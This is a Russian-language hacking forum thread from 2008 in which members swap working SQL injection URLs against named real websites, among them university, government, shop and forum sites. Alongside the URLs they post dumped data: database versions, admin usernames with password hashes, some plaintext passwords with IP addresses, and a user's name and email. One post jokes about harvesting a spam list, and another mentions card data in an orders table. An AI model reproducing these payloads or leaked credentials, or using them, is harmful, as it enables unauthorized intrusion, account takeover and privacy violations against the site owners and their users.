SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. satana8920

    satana8920 Палач Античата

    Joined:
    22 Sep 2006
    Messages:
    396
    Likes Received:
    138
    Reputations:
    6
    Продолжаем тему edu =)
    1й пошел =)
    сайт: http://www.bme.gatech.edu
    уязвимость:
    HTML:
    http://www.bme.gatech.edu/people/faculty_record.php?id=-1'+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
    инфо:
    Code:
     
    Database Version: 4.1.22
    Database name: faculty
    User name: web@localhost
    


    Сайт: https://its.kennesaw.edu/
    Уязвимость:
    HTML:
    https://its.kennesaw.edu/cms/index.php?id=-1+Union+select+1,2,3,version(),5/*
    Инфо:
    Code:
     
    Database Version: 4.0.17-standard-log
    Database name: cms
    User name: cms@localhost
    


    Сайт:http://www.uhh.hawaii.edu/
    Уязвимость:
    HTML:
    http://www.uhh.hawaii.edu/academics/hohonu/writing.php?id=-1+union+select+1,version(),3,4,5,6/*
    Инфо:
    Code:
     
    Database Version: 4.1.22-log
    Database name: hohonu
    User name: [email protected]
    


    Сайт:http://dispatch.fandm.edu/
    Уязвимость:
    HTML:
    http://dispatch.fandm.edu/category.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12/*
    Инфо:
    Code:
    Database Version: 4.1.22-log
    Database name: dispatch
    User name: dispatch_reader@localhost
    
    Еси кто расковыряет дальше то стучите самому лень так как 4я версия %)
     
    #6861 satana8920, 23 Nov 2008
    Last edited: 23 Nov 2008
  2. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Code:
    http://www.pro-xenon.ru/news.php?id=-1+union+select+1,concat(username,0x3a,user_password),3+FROM+phpbb_users+limit+1,1--
    логин/пасс:
    Code:
    ProXenon.Ru:e25325d4885c130ab5b652109adef63f
    ------------------------------------------
    Code:
    http://nigatrade.biz/realty/zakaz.php?id=-1+union+select+1,2,3,4,concat(name,0x3a,pwd),6,7,8,9,10,11,12+FROM+admins--
    логин/пасс:
    Code:
    rgk:686ff67efba121e906356233872afd2d
    -------------------------------------------
    Code:
    http://katalog.motorky.com/moto.php?id=-150+union+select+1,2,concat(username,0x3a,user_password),4,5,6,7,8,9+FROM+phpbb_users+limit+1,1--
    логин/пасс:
    Code:
    2 admin:bec47636b1594d444b88ec9eb4f15c7a
    ---------------------------------------------
    Code:
    http://yalta.org.ua/pages/person.php?id=-1+union+select+1,2,3,concat(nick,0x3a,password,0x3a,name,0x3a,email,0x3a,status),5,6,7,8,9,10,11,12,13,14+FROM+user_data--
    логин/пасс/имя/мыло/работа/статус:
    Code:
    Alex:1010:Игорь Данилов:[email protected]:0
    --------------------------------------------
    Code:
    http://www.express-bonus.ru/index.php?action=news&act=view&id=-1+union+select+1,concat(user_id,0x3a,username,0x3a%20,user_password,0x3a,user_email,0x3a,user_icq),3,4,%205,6+from+phpbb_users+limit+1,1/*
    логин/пасс/мыло/ася/имя:
    Code:
    administrator:e04796528f705256f97a8c290bfd3070:[email protected]
    Code:
    http://www.express-bonus.ru/index.php?action=news&act=view&id=-1+union+select+1,concat(user_id,0x3a,username,0x3a%20,user_password,0x3a,user_email,0x3a,user_icq),3,4,%205,6+from+phpbb_users+limit+1,600/*
    Собираем спам-базу :D :D :D
    --------------------------------------------
    Code:
    http://ron.the-underdogs.info/game.php?id=-135+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat_ws(0x3a,user,password),23,24,25,26,27,28,29,30,31,32,33,34,35+from+mysql.user/*
    логин/пасс:
    Code:
    root:4bca6e21230d24de  flashback:4e62830249e37403
     ron:1b4fdeb00b833ac5  macgarden:4a5fe7e15ca085b0  Underdogs:4bca6e21230d24de  doggie:69288c4855bbb52a 
    forum:3bd00f75423ddffd 
    hotu:3213f1351227ad25  
    community:4dfedf012cc6837d 
    zzt:0e5829ac32cde319  
    john_doe:70520cc9573c1cd3  phpAds:58efd1e0451c7a6c
    -------------------------------------------------
    Code:
    http://www.kiirus.ee/php/index.php?lang=rus&id=-6+union+select+1,pass_admin,3,4,5,6+from+admin
    Code:
    http://www.kiirus.ee/php/index.php?lang=rus&id=-6+union+select+1,pass_admin,3,4,5,6+from+admin
    логин/пасс:
    Code:
    Need4speed08:d2357411549940e64b552c99e78a1035
    --------------------------------------------------
    The End!
     
    3 people like this.
  3. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    http://www.marotori.com/news.php?id=2+union+select+1,2,3,4,5,6--

    Довольно нехилое портфолио у них в общем понравилось мне там.

    Database Version: 5.0.67-log
    Database name: marotor_site
    User name: [email protected]

    In database marotor_apa_datafeed found table datafeed_authentication
    0 : id
    1 : auth_username
    2 : auth_password
    3 : auth_ip
    4 : enable
    5 : currency_id

    [1]:11:approvedie:gogo123:91.186.19.1691.186.19.12990.207.170.23983.136.71.11590.207.70.121:1:3
    [2]:12:approveduk:gogo123:91.186.19.1691.186.19.12990.207.170.23983.136.71.11577.44.50.42:1:1
    [3]:13:telegraph:letmeinnow:91.186.19.1690.152.10.14891.186.19.12981.157.123.20891.109.166.13591.186.19.28:1:1
    [4]:14:readersdigest:gogo123:91.186.19.1691.186.19.129:1:1
    [5]:15:approvedgolf:gogo123:91.186.19.1691.186.19.129:1:1
    [6]:16:sandersonyoung:gogo123:91.186.19.1691.186.19.129:1:1

    Я так понял пароли открыты но вот че то дальше не смог.
    Может не там копался помогите...

    Тут админка если че. http://www.marotori.com/admin/
     
    1 person likes this.
  4. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Может кто захочет доковырять до конца, мне лень:)

    1) 4.1.11-Debian_4sarge2

    http://www.drumshop.co.uk/product.php?id=99999/**/union/**/select/**/1,22,23,24,unhex(hex(version())),26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--

    2) 5.0.45-community-nt

    http://www.streetendfeeds.co.uk/productdetails.php?id=789789789789%20UNION%20SELECT%201,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
     
  5. Ламоза

    Ламоза Member

    Joined:
    26 Jul 2008
    Messages:
    22
    Likes Received:
    7
    Reputations:
    0
    Смотрим в заголовок 4.1.11-Debian_4sarge7
    http://briefing.defenceandindustry.gov.au/category.php?id=-8+union+select+1,2,aes_decrypt(aes_encrypt(version(),0x71),0x71),4,5,6,7,8,9,10,11,12,13/*

    Швейцарские горлопаны в австралии :)
    http://www.swiss.org.au/member.php?ID=-20+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
    4.1.21-standard-log, таблица members есть, дальше не копал.
     
  6. plutus

    plutus Member

    Joined:
    3 Nov 2008
    Messages:
    25
    Likes Received:
    8
    Reputations:
    1
    http://hotelsaustri adirect.com/index.php?mod=re_search&ad=-7+union+select+1,2,3,4,concat(username,0x3e,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+websiteadmin_admin_users--
     
  7. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://ukrgazeta.plus.org.ua/article.php?ida=-594+union+select+1,2,3,4,5,6,7,8,9,10/*
    user(): u_plus@localhost
    database(): plus
    version(): 4.1.22

    //можете поздравить, у мну завтро днюхо!))
     
    _________________________
    4 people like this.
  8. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    http://www.fo-ra.ru/news.php?id=2 +union+select+1,version(),user(),database()--
    5.0.67-log
    [email protected]
    u152033_fora

    //faza02 с днюхой тебя хех,а у меня через 3 дня -)
     
  9. FNS

    FNS Member

    Joined:
    6 Nov 2008
    Messages:
    16
    Likes Received:
    11
    Reputations:
    0
    Your One-Stop Shop For Everything Lovely

    Code:
    https://www.shoparooni.com/plushform/item.php?id=2/**/and/**/1=0/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/**/from/**/PHPAUCTIONXL_adminusers--
    Админки не нашел.
     
    #6869 FNS, 24 Nov 2008
    Last edited: 24 Nov 2008
    1 person likes this.
  10. Fugitif

    Fugitif Elder - Старейшина

    Joined:
    23 Sep 2007
    Messages:
    407
    Likes Received:
    227
    Reputations:
    42
    Code:
    http://www.indwesgear.com/item.php?id=-1%20UNION%20SELECT%201,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
     
  11. FNS

    FNS Member

    Joined:
    6 Nov 2008
    Messages:
    16
    Likes Received:
    11
    Reputations:
    0
    Заказ номера в С. Петербурге

    Code:
    http://www.booking-all.com/order.php?id=-2+union+select+concat(admin_name,0x3a,admin_pass)+from+admin--
     
    1 person likes this.
  12. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    http://www.imperialtouch.com/page.php?id=-25+union+select+1,2,concat_ws(0x3A3a,version(),database())/*

    4.0.27-max-log::itadmin
    ________________________

    ;) ;) ;)

    http://www.ciaovillas.com/city_vacation_rentals.php?id=76&list=58&state=-39+union+select+concat_ws(0x3A3a,version(),database())--

    5.0.68-log::Sql139072_1
     
    #6872 ThreeD, 25 Nov 2008
    Last edited: 25 Nov 2008
    3 people like this.
  13. tromlen

    tromlen New Member

    Joined:
    23 Aug 2007
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    Код:
    https://www.shoparooni.com/plushform/item.php?id=2/**/and/**/1=0/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32/**/from/**/PHPAUCTIONXL_adminusers--

    Цитата:marlee:d89da8338e706977fc6c5902abac3ebe


    Админки не нашел.

    то FNS robots.txt смотрел ?
     
    1 person likes this.
  14. crystalbit

    crystalbit Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    212
    Likes Received:
    88
    Reputations:
    8
    тИЦ 325, PR 4

     
  15. XaCeRoC

    XaCeRoC Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    62
    Likes Received:
    23
    Reputations:
    -12
    ..
     
  16. XaCeRoC

    XaCeRoC Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    62
    Likes Received:
    23
    Reputations:
    -12
    ..
     
  17. crystalbit

    crystalbit Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    212
    Likes Received:
    88
    Reputations:
    8
    единственная найденная мною таблица - news
     
  18. crystalbit

    crystalbit Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    212
    Likes Received:
    88
    Reputations:
    8
    ..
     
  19. plutus

    plutus Member

    Joined:
    3 Nov 2008
    Messages:
    25
    Likes Received:
    8
    Reputations:
    1
    http://file-ma iler.com/faq_man/catagorie.php?cat_id=-1+union+select+1,2,3,concat_ws(0x3a,admin_name,admin_pass),5+from+faq_admin--

    oka:d13f0c63fc5bfb88b9aca27d1888551d
     
    1 person likes this.
  20. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    Shop. Вроде как диджейское оборудование и иже с ними.

    http://www.spectrumaudio.com/manprods.php?id=-69+union+select+1,concat_ws(0x3A3a,database(),version()),3,4--

    spect9_spectrumaudio::5.0.51a-community

    Дампим. Есть цэцэ кому интересно в таблице ордерс, они хешированы. Есть админские данные, админку не нашёл (или не искал?)) Не интересно.

    http://www.spectrumaudio.com/phpinfo.php
     
    1 person likes this.
Thread Status:
Not open for further replies.